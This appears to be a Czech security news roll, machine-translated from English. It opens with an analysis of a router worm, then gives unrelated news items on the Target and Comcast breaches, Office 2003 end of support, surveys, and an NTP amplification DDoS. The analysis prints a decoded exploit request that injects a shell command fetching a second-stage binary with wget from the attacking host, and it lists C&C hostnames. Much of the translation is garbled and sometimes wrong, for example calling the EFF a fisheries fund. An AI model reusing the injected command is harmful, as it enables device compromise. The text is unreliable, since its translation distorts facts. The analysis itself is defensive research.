% 5d% 3b% 74% 68% 65% 6e% 20% 77% 67% 65% 74% 20% 68% 74% 74% 70% 3A% 2F% 2F% xx% xx% 2e
% Xx% xx% xx% 2e% xx% xx% xx% 2e% xx% xx% xx% 3a% 31% 39% 33% 2f% 30% 52% 78% 2e% 6d% 69
% 64% 3b% 66% 69% 60 &% 53% 74% 61% 72% 74% 45% 50% 49% 3d% 31

Dekódovaný verze této žádosti:

submit_button = & change_action = & submit_type = & action = & commit = 0 & ttcp_num = 2 & ttcp_size = 2
& Ttcp_ip =-h
`Cd / tmp, pokud [! .-E L26], pak wget http:// [zdroj IP]: 193/0Rx.mid; fi `
& StartEPI = 1
Takže to vypadá, že se bude snažit stáhnout "druhou fázi" z portu 193 z útočícího routeru. Soubor ". L26" Zdá se, že soubor zámek, aby se zabránilo vícenásobné využití.

Jsem srážkové úplnou adresu URL pro teď, dokud můžu zjistit, jestli tam je oprava, nebo jestli je to veřejná / známý využít.

Port Zdá se změní, ale je vždy <1024. Druhá etapa Binární si vždy tři písmena a pak "náhodný" rozšíření.

Zde jsou MD5s některých dvojhvězd jsem načtených tak daleko. Jsou ELF binárky. Pokud by někdo chtěl pomáhat při jejich couvání, prosím, kontaktujte mě na vzorku.

d9547024ace9d91037cbeee5161df33e 0dQ.png
a85e4a90a7b303155477ee1697995a43 Dsn.raw
88a5c5f9c5de5ba612ec96682d61c7bb EXr.pdf
ef19de47b051cb01928cab1a4f3eaa0e Osn.asc

Typ souboru: ELF 32-bit LSB executable, MIPS, na MIPS I verze 1 (SYSV), staticky propojeny, zbavený

Budu aktualizovat tento deník trochu blow-by-ránu, jako i já jsem stále zvrátit části druhé etapy.

- Binární obsahuje sadu těžké kódovaných netblocks (/ 24 a / 21), které by mohly bloky skenuje.
- Existují i ​​napevno jména dyndyn.org hostitele. Nejste si jisti, ale to, co oni jsou (C & C?): Azlan281.dyndns.org, littlefrog.dyndns.org, charinalg06.dyndns.org, xplunk.dyndns-home.com a více.
- Jen na základě "řetězce", přesto to vypadá, že tam je velení a řízení využití kanálu na zprávu o stavu hostitele.
- Seznam uživatelských agentů:
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv: 1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)
Mozilla/2.0 (compatible; MSIE 3.0b, Win32)
Mozilla/4.0 (compatible; MSIE 4.01, Mac_PowerPC)
Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0;. NET CLR 1.0.3705)
Mozilla/4.0 (compatible; MSIE 6.0, Win32) WebWasher 3.0
Mozilla/4.0 (compatible; Opera/3.0, Windows 4.10) 3.51 [en]
Mozilla/5.0 (compatible; Konqueror/2.2.2, Linux 2.4.14-xfs, X11, i686)
Mozilla/5.0 (compatible; SnapPreviewBot, en-US; rv: 1.8.0.9) Gecko/20061206 Firefox/1.5.0.9
Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit / xxx.x (KHTML like Gecko) Safari/12x.x
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv: 1.0.1) Gecko/20030306 Camino/0.7
Opera/9.60 (Windows NT 5.1; U; de) Presto/2.1.1
Opera/9.0 (Windows NT 5.1; U; en)
Mozilla/5.0 Galeon/1.0.2 (X11; Linux i686, U ;) Gecko/20011224
Opera/6.x (Linux 2.4.8-26mdk i686, U) [en]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3
Mozilla/5.0 (X11; Linux i686, U, rv: 1.7.13) Gecko/20070322 Kazehakase/0.4.4.1

- Seznam serverů bannerů:
Apache/2.2.9 (Fedora)
Apache/1.3.3 (Unix) (Red Hat / Linux)
Apache/1.3.23
Microsoft-IIS/5.0
Nginx
Microsoft-IIS/5.1
Netscape-Enterprise/4.1
Microsoft-IIS/6.0
Apache/2.2.24 (Amazon)
Sun-ONE-Web-Server/6.1
Microsoft-IIS/7.5
IBM_HTTP_Server

Rozšíření a mediální typy používané pro druhé fázi souborů:

application / pdf
. Pdf
image / png
image / gif
Gif.
image / jpeg
. Jpg
image / bmp
. Bmp
image / tiff
. Tif
audio/ac3
. Ac3
audio / asc
. Asc
audio / ogg
. Ogg
audio / midi
. Mid
audio / mpeg
. Mpg
video / mpeg
video / avi
. Avi
video / raw
. Surovin

Binární je spojeno proti OpenSSL, tak C & C kanál použít SSL.

Binární také obsahuje několik obrázků (díky Peter za ukázal, že mimo). Datum vytvoření snímků je 09.5.2013. Zdá se, že loga identifikující autora? Existuje celkem 5 obrázků PNG. 3 smajlíky a 2 loga. Jsem včetně větší loga níže. Existuje celá řada strun s odkazy na "Lunar", "měsíc", "planety", které se zdají být použit jako součást C & C kanálu.
Odkaz na "Lunar Industries" a logem Zdá se, že odkaz na film "Moon" http://www.imdb.com/title/tt1182345/


Nejen Windows XP: Končí i podpora MS Office 2003

13.2.2014 Zranitelnosti
Ačkoliv riziko plynoucí z neaktualizovaného kancelářského balíku je menší než v případě operačního systému, i konec bezpečnostních aktualizací MS Office 2003 je pro zákazníky důležitý.

Windows XP nejsou jediným masově používaným softwarem Microsoftu, jehož podpora se blíží ke svému konci. Spolu s ním bude 8. dubna 2014 vydán poslední balíček záplat také pro MS Office 2003 a MS Exchange 2003.

Absence další nabídky bezpečnostních oprav není ani v případě kancelářského balíku zanedbatelná. Mnohé útoky se provádějí právě přes soubor ve formátu kancelářské aplikace, který je umístěn na webový server nebo zaslán e-mailem.

Analytici Wes Miller ze společnosti Direction a Michael Silver z Gartneru se shodují, že Office 2003 a Windows XP sdílejí v mnoha podnicích společný osud, proto by se konec podpory Office 2003 neměl podceňovat. Windows XP se výrazněji uchytily po vydání Service Packu 2 zhruba ve stejné době, jako přišel na trh MS Office 2003. Podniky pak obvykle přeskočily následující aktualizaci, tedy Vista a Office 2007. Příčinou byla (kromě samotného aktualizačního cyklu) i spokojenost s předcházejícími verzemi softwaru, rozpačité přijetí Windows Vista i ribbonů (pásů karet) v MS Office 2007.

Každopádně tak MS Office do značné míry následuje přijetí Windows. Firmy obvykle přecházely z Windows XP na Windows 7, podobně z MS Office 2003 na verzi 2010. Stejně tak rozpačité je v podnicích zase přijetí Windows 8 i Office 2013.

Oba analytici, Millet a Silver, se ovšem liší v odhadu, nakolik se v prostředích s přetrvávajícími Windows XP provozuje i MS Office 2003. Silver usuzuje, že to bude asi 30-40 %, Millet hádá více. Přesné statistiky k dispozici nejsou, protože penetrace operačních systémů se zjišťuje především při návštěvách webu, kdy se identifikuje prohlížeč, OS pod ním a plug-iny browseru, nikoliv však ostatní aplikace. Další rozbory mají nicméně naznačovat, že kritika ribbonů postupně odeznívala, takže některé firmy aktualizovaly dříve kancelářskou sadu než operační systém. (Mimochodem, Julie Larson-Greenová, která měla v Microsoftu hlavní podíl na volbě ribbonů, je nyní odpovědná mj. za tablet Surface.) Faktem také je, že Windows XP mnohdy přetrvávají nikoliv na klasických PC, ale na vestavěných (embedded) systémech, včetně např. bankomatů.

Ačkoliv riziko plynoucí z neaktualizovaného kancelářského balíku je menší než v případě operačního systému, i konec bezpečnostních aktualizací MS Office 2003 je pro zákazníky důležitý, vždyť v roce 2013 bylo pro tuto verzi určeno 10 bulletinů zabezpečení. Pokud tedy zákazníci chtějí software nadále používat, měli by udělat alespoň několik základních úprav, například zakázat makra.

Nakonec nelze zapomenout ani na to, že současně končí podpora „back-endu“, tedy serveru MS Exchange 2003. I zde se aktualizační cyklus v podnicích podobal Windows a MS Office, tedy vynechána byla verze Exchange 2010 a ve větší míře se upgradovalo až na verzi 2010. Exchange 2003 byl obvykle instalován na Windows Server 2003, který bude podporován do roku 2015. Zde může upgrade být spojen s další komplikací: Windows Server 2003 byl ještě k dispozici i ve 32bitové verzi, následující serverový software již jen jako 64bitový. V některých případech se přechod na vyšší verze proto možná odkládal (odkládá) kvůli hardwaru.


Hackeři porušení poštovní servery Comcast
12.2.2014 Incident
Po úspěšném cílení Bell Canada a úniku informací o zákaznících, hacker kolektivní NullCrew zřejmě porušil poštovní servery, které patří do Comcast, největší ISP v USA.

Tvrdí, že využili místní začlenění souboru (LFI) Chyba zabezpečení v Zimbra, groupware e-mailový server a webový klient použít na 34 Comcast poštovních serverů, aby jim a jejich přístup k obsahu. Aby dokázal, že jejich "vítězství", které souvisí s Pastebin příspěvek obsahuje seznam serverů, a využívat kódu, které zřejmě použitý v útoku. Databreaches.net hlásí , že příspěvek nezahrnoval informace o zákaznících, i když jeden z útočníků znamenal , že se dostali do rukou databázi hesel. Comcast ještě vyjádřit k tvrzení, ale zdá se, že se snaží ochránit své poštovní servery z dalších útoků se, že zneužití kódu je veřejná tím je zrušit v současné době.


Cílové útočníci zneužít síťových pověření společnosti HVAC
12.2.2014 Kriminalita
Zdroje blízké vyšetřování Target porušení pojmenovali dodavatele třetí strany, jehož síťová pověření útočníci použít k získání přístupu k systému TARGET v systému. Dotčená společnost je Fazio Mechanical Services, chlazení a HVAC (topení, ventilace a klimatizace) poskytovatel se sídlem v Sharpsburg, Pennsylvania. "Není to okamžitě jasné, proč by Cílová dali společnost HVAC externí přístup k síti, nebo proč, že přístup by neměl být ohraničena kordonem ze sítě platebního systému TARGET je. ale podle odborníka kybernetické bezpečnosti na velké prodejce, který si nepřál být jmenován, protože neměl oprávnění mluvit o záznamu, to je obyčejné pro velké maloobchodní operace, které mají tým, který pravidelně monitoruje spotřebu energie a teploty v obchodech ušetřit na nákladech (zejména v noci) a upozornit obchod manažeři, pokud teploty v obchodech se pohybují mimo přijatelném rozsahu, který by mohl zabránit zákazníky od nakupování v obchodě, " uvádí Brian Krebs. "Na podporu tohoto řešení, prodejci musí být schopen dálkově do systému s cílem provést údržbu (aktualizace , skvrny, atd.), nebo potíží s závady a problémy s připojením se softwarem, "vysvětlil zdroj. generální ředitel společnosti v otázce se nevyjádřil k otázce, kromě tím, že byly navštívil americkou tajnou službou v připojení k vyšetřování. další podrobnosti odhalené o porušení, je, že útočníci začali nahrávat POS malware 15. listopadu, a na konci tohoto měsíce, většina zařízení POS cílových byly ohroženy. údaje slurping začal 27. listopadu, a trvala až do prosince 15 a ukradl informace byly exfiltrated přes FTP na počtu serverů umístěných v Rusku, USA, Brazílii a dalších zemích. Ve světle těchto nových odhalení, otázka je, co teď pokuty Target bude muset zaplatit, protože to nesplní pravidla ochrany nařízené podle aktuálního odvětví platebních karet Data Security Standard.


HTTPS Everywhere add-on je nyní k dispozici pro Firefox na Android
12.2.2014 Bezpečnost
Electronic Frontier Foundation (EFF), oznámila vydání beta verze jeho HTTPS Everywhere rozšíření pro Firefox na Android. HTTPS Everywhere se vyrábí jako spolupráce mezi The Tor Project a Evropského rybářského fondu. Prodloužení přepíše všechny požadavky na místa z HTTP HTTPS, kdykoliv je to možné - tedy v případě, že webová stránka podporuje HTTPS na prvním místě - a tím zvýšení bezpečnosti uživatelů a soukromí. Až teď, to bylo k dispozici pouze pro desktopové verze Firefoxu, Chrome a Opera. "Mnoho stránek na nabídku webové některé omezenou podporu pro šifrování přes HTTPS, ale je obtížné používat. Například, oni mohou výchozí nešifrované HTTP, nebo vyplňte šifrované stránky s odkazy, které jdou zpět do nešifrované stránky ", EFF vysvětluje. "Jak nosit naše telefony a tablety, často se připojit k unfamilar WiFi sítí, uvedení své osobní údaje v nebezpečí, že budou sledovány, shromažďovány, a hrál si s někým jiným ve stejné síti, stejně jako poskytovatelé internetových služeb, provozovatelů sítí, a vládních agentur, " oni poznamenal s tím, že HTTPS Everywhere chrání proti působení těchto útoků. Jakmile je nainstalován, můžete vidět, že rozšíření se pracuje při pohledu na jeho ikonu na pravé straně adresního řádku:

Jedním kliknutím na ikonu umožňuje zapnout a vypnout. Zatímco toto je vítanou zprávou pro uživatele Android, iPhone a iPad mohou uživatelé nemohou doufat, že mít možnost využít tohoto rozšíření. "Je nám líto, že nemůžeme vám pomohou zabezpečit váš mobilní prohlížení webu. politika Apple zamykání z Mozilly znamená, že nemůžete mít více bezpečný prohlížeč v kapse, "EFF Parker Higgins a Yan Zhu vysvětlil.


Dospělí přiznat, že přihlášení do svých partnerů sociálních médií účtů
12.2.2014 Sociální sítě
Nový výzkum ukazuje, že jeden ze čtyř Britů bude odeslání drzý zprávu nebo fotku na své druhé poloviny. Nicméně, milovníci chtít myslet dvakrát před zasažením pošlete je na intimní obsahu, varuje poskytovatel internetových security, McAfee, jenž dnes zveřejnila výsledky svého "láska, vztahy a technologie" zprávy.

Studie odhaluje, více než polovina (55%), Britů, kteří odeslaných nebo přijatých intimní nebo sexuálně explicitní obsah, ještě je uložen na svém mobilním zařízení, a to navzdory skutečnosti, že jeden ze tří (31%), nemají ani tu nejzákladnější ochranu heslem na jejich smartphonů. Z těch, které mají ochranu proti 42% používá stejné informace pro více internetových připojených zařízení, čímž se zvyšuje pravděpodobnost, že tato zařízení budou hacknutý. Britové byli také odhalil, že příliš důvěřivý osobní informace, jako 34% z dotázaných sdílel osobní hesla se manžel nebo významný jiný, a 96% důvěřuje své druhé poloviny, že nebudete posílat důvěrné zprávy nebo sexts on-line. Nicméně i přes tuto důvěru 45% dotázaných se přiznala k přihlašování do svých partnerů sociálních nebo app profilů pomocí své heslo slídění na obsah odeslaných a přijatých. "V této době" vždy "spotřebitelů, pravidla kolem soukromí v datování ztratil některé sociální potence. Téměř polovina dotázaných se probírat privátních online účtů partnera, což snooping všední událost. V době, kdy sdílení obsahu s tisíci může trvat několik sekund, riziko osobního obsahu úniku on-line nikdy nebyla vyšší, a zda partner je důvěryhodný, nebo ne, že je životně důležité chránit sebe a své zařízení "komentoval Samantha Swift, on-line bezpečnosti . Expert, McAfee " Andy Jones, expert vztah a bývalý datování publicista řekl zjištění: "Žijeme v nemorální době, kdy celebrity Sexting skandály jsou dvě penny a patentky soukromých částí těla jít virové přes noc. Za každou úniku médií, od prince Harryho neslavný noci v Las Vegas na Scarlett Johansson nahé selfies, je smartphone. Jsme generace žijící s digitálním zavazadel, zda jste obětí hack nebo mstivý milence, obrázky unikly on-line vydrží po celý život. Digitální Daters musíte se dostat moudré e-etikety a začít chránit jejich online pověst. Jako orientační pravidlo, pokud je to něco, co byste nechtěli, aby vaše rodina vidět asi neměl sdílejte ji! " McAfee radí spotřebitelům, aby sdílení hesel nebo kódů pro mobilní zařízení s ostatními, které pomohou udržet osobní obsah v bezpečí. Mobilní uživatelé se rovněž vyzývají, aby nepoužíval slabá hesla, která lze snadno určit jako jsou narozeniny, čísla v řadě a opakovat čísla pro své zařízení. Spíše šestimístná hesel a slov převést na čísla pomocí mobilního klávesnice jsou silnější a měla by být využívána. Další nálezy z této studie patří: Ne soukromí v digitálním roku 20% Britů dotázaných přiznala k užívání svého partnera mobilní vidět, jaký typ fotografií nebo zpráv bylo na něm, což bylo nejčastější u žen, s přibližně čtvrtina (24%) ze všech žen přiznává, dívat se skrz zařízení svého partnera. Mezitím muži jsou více pravděpodobné, že tajně zkontrolovat e-mailové nebo sociální účty jejich partnera, protože 50% se přiznal k přihlášení na sociální profily médií svého manžela nebo významný jiný, zatímco 35% se kontrolovat své e-maily. Celkově 58% mužské činnosti bylo provedeno v tajnosti. Youth jsou nejvíce vystaveny riziku Když to přišlo k zasílání sexts a explicitní obsah mladší generace byly nejaktivnější a umístění se na největší riziko expozice, 38% ve věku 18-24 let přijat na posílání sexts nebo explicitní obsah, zatímco pětina (21%) z 25 až 34 rok věku byl, pokud jde o natáčení sexuální obsah videa na svém mobilním zařízení pryč. Výzkum také ukázal, že explicitní obsah je větší pravděpodobnost, že budou sdíleny v méně formálně stanovených vztahů, 49% respondentů poslal sexts a intimní zprávy na přítele nebo přítelkyně, zatímco 31% ji poslal příteli, že "hook-up s" a 13% sdílený obsah s úplně cizí. To je ve srovnání s 24%, který ji poslal na manžela nebo manželku. Ex etiketa když dotázaných jasně důvěřovat svým partnerům v mezích vztahu, pokud tento vztah se porouchá riziko digitální odplata stoupá. Výzkum ukazuje, že jeden z pěti (20%) sdílela heslo s ex, zatímco 73% změnilo, že heslo na rozbití a více než čtvrtina (27%) se neobtěžoval, takže se otevřený digitální snooping. Když přišlo na explicitní obsah, jen 14% mužů a 35% žen požádal tohoto obsahu je třeba odstranit na konci vztahu. Ačkoli akty pomsty nebyly hojné, 7% respondentů hledal pomstychtivou žalobu na ex pomocí vlastní obsah.


Efektivní reakce na incidenty
12.2.2014 Incidenty
Organizace jsou bombardováni s potenciálními hrozbami každý den. Většina z nich jsou malé a dráždivé, a to opravdu kritická - ale mezi ty jehly jsou malé závity větších akcí při práci. Program reakce na incidenty umožňuje vytáhnout jehly, které tvoří kupce sena velký obrázek, podle Jaime Blasco, ředitel v AlienVault Labs.

Klikněte zde pro kompletní Infographic

Konečným cílem programu na reakce událost je nejen účinně obsahovat jednu událost, ale na začátek modelování techniky útoku. Odpověď Incident je založen na přístupu, který detekuje a uvádí kroky, které útočníkovi dovolit ohrozit bezpečnost systému. tým reakce na incidenty pak použije tyto informace pro řízení budoucích činností reakce na incidenty. V tomto modelu chování, které se mohou zdát neškodné před analýzou mohou sloužit jako prediktivní ukazatel většího útoku. Budování rámec je reakce na incidenty umožňuje organizaci, aby v obrovské množství podniků a bezpečnosti dat, budování vztahů mezi těmito daty a prezentovat ji v jediném sjednoceném postupu. Tento pracovní postup představuje jak obchodní a technické informace v jediném zobrazení. Analytici mohou trávit mnohem méně času učení jednotlivých ovládacích bezpečnostní technologie a mnohem více času analyzovat, najít vzory, a rozhodování reakce. Klíčové pojmy k úspěšnému programu reakce na incidenty, jsou následující:

Zákon o to, co se vám podaří-spustit na to, co víte, jak účinně reagovat.
Neexistuje často používaný bezpečnostní politiku, který pracuje pro organizaci po celou dobu, mimo zákonných požadavků. Nezapomeňte, obchodní procesy definovat politiku, ne naopak.
Sledování bezpečnosti je zásadní a základním prvkem každého programu reakce na incidenty.
Jak už název napovídá, reakce na incidenty zahrnuje reakci na některých ukazatelů o skutečném nebo potenciálním výskytem ukazatelů, které jsou zjištěny na základě sledování bezpečnosti. Indikátory jsou kontextové informace čerpány z řady technických a administrativních zdrojů.


Každé dvě sekundy je tu nová obětí podvodného zneužití totožnosti
12.2.2014 Kriminalita
Javelin Strategy & Research hlásí nárůst o více než 500.000 obětí podvodů na 13,1 milionu lidí v roce 2013. Účet podvod převzetí hit nový rekord ve výskytu pro druhý rok v řadě, a tvořily 28 procent všech podvodného zneužití totožnosti. Kromě toho, podvodníci stále obrátil na eBay, PayPal a Amazon se ukradené informace, aby nákupy. V roce 2013, porušení dat se staly více škodlivé, s jedním ze tří lidí, kteří dostávali data narušení oznamovací dopis stává obětí podvodného zneužití totožnosti. Povzbudivé je, že částka, kterou zločinci ukradl snížil o 3 mld. dolarů na $ 18, což odráží další agresivní akce od finančních institucí, poskytovatelů ochrany proti krádeži identity a spotřebitelů. Identity podvod je definováno jako neoprávněné použití osobních údajů jiné osoby k dosažení nedovoleného finanční zisk. Identity podvod se může pohybovat od jednoduše pomocí účtu ukradené platební karty, k tomu, aby podvodné nákup, na převzetí kontroly stávajících účtů nebo otevření nových účtů, včetně mobilního telefonu nebo inženýrských sítí. V říjnu 2013 Javelin Strategy & Research provedla adresa bázi Průzkum z 5634 amerických spotřebitelů identifikovat důležité poznatky o dopadu podvodů, odhalit oblasti pokroku a identifikovat oblasti, ve kterých musí spotřebitel uplatnit pokračující bdělosti. další oběti, méně ukradené - počet identifikačních incidentů podvodů zvýšil o 500 tisíc spotřebitelů v uplynulém roce , zatímco částka v dolarech ukradl snížila až 18 miliard dolarů, což výrazně nižší, než je nejvyšší za celou dobu 48 miliard dolarů v roce 2004. Ti mezi 35-44 byly v největší riziko. V případě úspěchu, podvodníci jsou nyní více než třikrát vyšší pravděpodobnost, použít peníze ukradené koupit předplacené nebo dárkové karty, aby podvodné nákupy. Typy podvodů změnil - účet převzetí vzrostl dramaticky - Zločinci se mění chování zneužít zranitelnosti. Většina výmluvně, účet převzetí hit nový rekord ve výskytu pro druhý rok v řadě, a tvořily 28 procent identity ztrát podvodů. Účet převzetí za služby a mobilní telefon podvody téměř ztrojnásobil, protože podvodníci přidat nové vlastnosti, které inženýrských účty obětí a vyběhnout neoprávněných poplatků za použití "prémii" textových služeb. Spotřebitelé, které jsou obětí účtu převzetí tendenci začít platit účty on-line ke zlepšení bezpečnosti. Datové porušení jsou největším rizikovým faktorem pro zneužití cizí identity - V roce 2013, jeden ze tří spotřebitelů, kteří obdrželi oznámení o porušení dat, se stal obětí podvodu. To je až z jedné na čtyři v roce 2012. Čtyřicet šest procent spotřebitelů s porušené debetní kartou v roce 2013 se stal obětí podvodu ve stejném roce, ve srovnání s pouze 16 procent spotřebitelů se číslo sociálního zabezpečení porušena. Identity podvod je víc než jen podvody s kreditními kartami - Konkrétně, podvody non-karet došlo k rychlému nárůstu v roce 2013. Počet obětí podvodu non-karet téměř ztrojnásobil, a to činil 5 miliard dolarů podvodu. Tento podvod zahrnuje: ohrožena úvěrové linky, internetové účty (např. na eBay) a e-mailové platební účty, jako je PayPal.


Jak akce Edward Snowdena je ovlivněn dodavatele obranných
12.2.2014 Šifrování | Bezpečnost | Ochrana
Nová studie ThreatTrack Security vrhá světlo na postoje velmi exkluzivní skupinu IT a bezpečnostní manažery - ti zaměstnán dodavatelů Spojených států obrany - v době, kdy národní kybernetické je pod kontrolou.

75% respondentů uvedlo, že Edward Snowden událost změnila kybernetické praktiky svých firem na jednom z následujících způsobů:
55% uvádí, že jejich zaměstnanci nyní získat více školení o kybernetické
52% přezkoumala nebo přehodnotit přístup k datům práva zaměstnanců
47% jsou na vyšší pohotovosti pro neobvyklé síťové aktivitě ze strany zaměstnanců
41% zavedly přísnější najímání
39% uvádí, že byly omezeny jejich vlastní práva pro správu IT.
63% respondentů držet buď tajné, přísně tajné nebo důvěrné vůle. Nicméně, z těch, kteří mají přístup k, nebo obchod důvěrné informace, 27% ​​nemají takové vůle. To představuje potenciální privilegovaný přístup problém, kde může mít snadný přístup k citlivým vládních údajů zaměstnanců dodavatelských bez těchto vůlí se. Kromě odhaluje, jak se jejich bezpečnostní postupy se změnily ve světle Edward Snowden incidentu, Průzkum také zkoumal předměty, například zda narušení bezpečnosti osobních údajů jsou hlášeny, co nejobtížnější aspekty kybernetické obrany je, zda starší lídři v dodavatelských organizací jsou infikovány malwarem vzhledem k rizikovému chování online, zda vláda poskytuje správné vedení a podporu pro kybernetické obrany, a zda dodavatelé se obávají, že jejich organizace mohou být ohroženy sofistikovaných kybernetických hrozeb. Průzkum zjistil, vysokou úroveň důvěry ve vládní poradenství o tom, jak chránit citlivá data. 88% respondentů se domnívá, že dostanou, co potřebují, pokud jde o podporu na tomto poli. Nicméně, 62% stále hlásil, že se jedná o jejich organizace je citlivá na apts, cílených útoků škodlivého softwaru a sofistikované počítačové kriminality a cyber-špionáže taktiky. dva nejtěžší aspekty bránit proti pokročilým malware byly hlášeny být objem malware útoků (61 % uvedlo, že tomu tak bylo) a složitost tohoto malware (59%). Další 29% řekl, že není dost rozpočet správnými nástroji, a 22% uvedlo, že prostě nemají přístup k automatizovaným malware analýzy řešení, které dokáže detekovat a sanaci nejvíce sofistikovaných hrozeb v reálném čase. "Je to zajímavé, na vědomí, že zatímco Armádní dodavatelé Zdá se, že lepší bezpečnostní postupy v místě a jsou více transparentní než mnoho společností v soukromém sektoru, které zjišťují aktuální cyber ohrožení nápor stejně obtížné řešit, "řekl prezident ThreatTrack Bezpečnost a generální ředitel Julian Waits, Sr "Více než polovina se obává, že jsou citlivé na cílené útoky a kybernetické špionáže, a vzhledem k druhu údajů, které jsou manipulace a skladování, myslíme si, že číslo musí dostat mnohem menší -. a rychle" 26% respondentů uvedlo, že je zde nedostatek vysoce kvalifikovaných bezpečnostních pracovníků (malware analytiků) na zaměstnance. Předchozí studie ukázaly, že tento nedostatek je ještě umocněn tím, že IT bezpečnostní personál je běžně multi-tasking mezi novým malware analýzy vzorků - což obvykle trvá více než 2 hodiny na vzorek -. A čištění malware vypnutí přístroje manažery " I když mnohem zodpovědnější než jejich protějšky v soukromém sektoru, v následujících ceny, obrana dodavatel IT manažeři odhalil přístroj používaný člen jejich vrcholového vedení týmu se stal napaden škodlivým softwarem kvůli vedení:

Návštěva pornografické webové stránky (13%) - ve srovnání s 40% v jiných podniků
Kliknutím na škodlivý odkaz v e-mailu phishing (40%) - ve srovnání s 56% v jiných podniků
Povolení člen rodiny používat firemní-vlastnil zařízení (14%) - v porovnání s 45% v jiných podniků.
Studie také odhalila mnohem více transparentnosti o narušení dat v obranných dodavatelských organizací než v běžné podnikové komunitě. Pouze 8% uvedlo, že si byli vědomi, že došlo k porušení dat v jejich společnosti, které nebyly hlášeny k zákazníkům, partnerům a vládních agentur, s nimiž smlouvu. To ve srovnání s 57% malwaru analytiků v ​​podnikových prostředích, kteří uvedli, že byli vědomi porušení, které bylo nahlášeno. nezávislé slepé průzkumu 100 / manažerů IT bezpečnosti nebo zaměstnance v rámci obrany dodavatelských organizací, které se zabývají údaje pro americkou vládu bylo provedeno Stanovisko věcech jménem ThreatTrack bezpečnosti z listopadu 2013 do ledna 2014.


Nejisté sdílení souborů staví firemní data v ohrožení
12.2.2014 Bezpečnost
Osobní e-mail může být 2014 je největší hrozbou pro firemní data. Nový průzkum z více než 500 odborníků od GlobalSCAPE zjistil, že v posledních 12 měsících, 63 procent zaměstnanců se používají osobní e-mail Poslat citlivých pracovních dokumentů. Snad více překvapující, 74 procent z těch zaměstnanců věří, že jejich společnosti schválit tohoto typu chování, sdílení souborů.

Hrozba spotřebitele stupně metod přenosu souboru sahá daleko za využití zaměstnanců osobního e-mailu. Za posledních 12 měsíců:
63 procent zaměstnanců se používá dálkový zařízení pro ukládání dat, jako jsou USB disky, pro přenos důvěrných pracovní soubory
45 procent zaměstnanců jsou použity spotřebitelské lokalit, jako je Dropbox a Box.net pro citlivé obchodní informace sdílet
30 procent zaměstnanců se používá pro ukládání cloud služby pro soubory související s prací.
"Miliony zaměstnanců se aktivně pomocí nástrojů pro spotřebitele-stupně, stejně jako osobní e-mail, sociální média, a sdílení souborů stránek, přesunout důvěrné pracovních souborů každý den," řekl James Bindseil, prezident a generální ředitel společnosti GlobalSCAPE, vývojář bezpečné výměny informací, řešení . "I když záměrem je obvykle neškodné, mohou tato opatření mají vážné zabezpečení a dodržování předpisů důsledky." spoléhání Zaměstnanci na nářadí spotřebitel-grade přenášet soubory, není izolovaný problém. Téměř polovina všech zaměstnanců sledovaných přenos pracovních souborů prostřednictvím nezabezpečených kanálů ( Vzdálené úložiště, osobní e-mail, cloud storage, nebo místa spotřební přenos souborů), několikrát týdně. "Zjistili jsme, že 80 procent zaměstnanců dotazovaných, které používají osobní e-mail pro přenos citlivých pracovních souborů to alespoň jednou za měsíc," říká Bindseil . "Ještě děsivější: téměř třetina z této skupiny, ví o tom, že jejich osobní e-mail byl hacknutý alespoň jednou - a přesto i nadále, aby informace o společnosti v ohrožení." IT oddělení se snaží vytvářet účinné politiky pro sdílení informací a vzdělávání zaměstnanců o rizicích používání nezabezpečených kanálů. Podle průzkumu GlobalSCAPE je pouze 47 procent zaměstnanců si myslí, že společnosti, které pracují pro zavedou zásady pro zasílání citlivých souborů. Téměř třetina odpověděla, že to tam bylo žádné politiky na svém místě, a 22 procent nebylo jistý. prosazování politiky je také chybí. zaměstnanců ve firmách, které mají politiky pro zasílání citlivých souborů, 54 procent nadále používat osobní e-mail, a 62 procent stále používat vzdálená zařízení. "potřebuje sdílení informací z dnešní pracovní síly se rychle vyvíjí, a většina organizací se nedaří držet krok, "říká Bindseil." Zaměstnanci potřebují a očekávají okamžitý přístup k informacím a schopnost posílat a ukládat soubory pouhým stisknutím tlačítka. Když se vnitřní technologie a nástroje přijít krátká, budou zaměstnanci najít . řešení " I když existuje mnoho důvodů, proč zaměstnanci najít alternativy k jejich nástrojů přenosu souborů společnosti-za předpokladu, že největší řidiči jsou jednoduchost a snadnost použití Podle průzkumu GlobalSCAPE je.:

52 procent uvedlo, že je výhodnější použít nástroj, který dobře znají
33 procent uvedlo, že příjemci měli potíže s přístupem soubory zaslané prostřednictvím systému společnosti
18 procent uvedlo, že používají alternativy, protože nástroj společnosti nenabízí mobilní přístup.
"Rychlost, jednoduchost a mobilní přístup je kritický," řekl Bindseil. "Pokud podniky mají nějakou naději na správu a zabezpečení citlivých dat opouštějí jejich organizaci, které je třeba poskytnout řešení, které se snadno integrují do každodenní rutiny svých zaměstnanců."


400Gbps NTP bázi DDoS útok zasáhne Cloudflare
12.2.2014 Počítačový útok
Matthew Prince, generální ředitel Obsah dodávky sítě Cloudflare, se potvrdil na Twitteru v pondělí, že jeden z jeho zákazníků byl určen s velmi velkým Network Time Protocol (NTP) reflexe útoku - "větší, že Spamhaus útok z minulého roku. "
 

Neměl jméno zákazníka, ale má společné, že útok dosáhl úrovně více než 400 gigabitů za sekundu, to je pravděpodobně způsobeno dopravní zácpy na některých peering burzách (především v Evropě), který (na základě údajů vzorku) je zneužita jen více než 4500 nesprávně nakonfigurovaných serverů NTP, a že zákazník původně chtěl zaplatit ukradenou kreditní kartou. Navzdory doporučení vydané US-CERT o aktualizaci veřejných směřující NTP servery na ntpd verzi, která neumožňuje útočníci je použít pro NTP zesílení útoků, stále existuje mnoho zranitelných tam. "Útok se opírá o využívání" monlist "funkci NTP, jak je popsáno v CVE-2013-5211, která je ve výchozím nastavení povolena na starších NTP-schopné zařízení. Tato příkaz způsobí, seznam posledních 600 IP adres, které připojených k NTP serveru, který bude odeslán na oběti, "vysvětluje US-CERT. "Vzhledem k tomu, falešnou zdrojovou adresu, když NTP server odešle odpověď je poslán místo toho oběť. Protože velikost odezvy je obvykle podstatně větší než žádost, útočník je schopen zesilovat objem dopravy zaměřené na oběti. 